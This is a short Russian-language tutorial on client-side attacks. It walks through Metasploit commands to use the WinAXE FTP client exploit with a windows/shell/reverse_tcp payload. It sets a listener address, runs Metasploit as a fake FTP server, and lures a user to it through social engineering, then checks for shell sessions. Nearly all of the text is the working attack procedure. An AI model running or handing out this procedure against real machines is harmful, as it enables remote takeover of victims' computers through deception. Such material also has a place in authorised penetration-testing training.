Получение доступа к системе через клиентские атаки

Подбираем эксплоит и пейлоад. Делаем так что метасплоит будет работать в режиме сервера.

Создаем фейковый FTP сервер. После отправляем ссылку на сервер пользователю с помощью социальной инженерии.

msf5 > search type:exploit platform:windows winaxe

use exploit/windows/ftp/winaxe_server_ready

далее выбираем payload, к его выбору нужно отнестись серьезно. Payload будет создавать самостоятельный процес.

show payloads

set payload windows/shell/reverse_tcp

set options

set SRVHOST 192.168.1.10

set lhost 192.168.1.10

exploit

после запуска метасплоит будет работать в режиме сервера FTP

sessions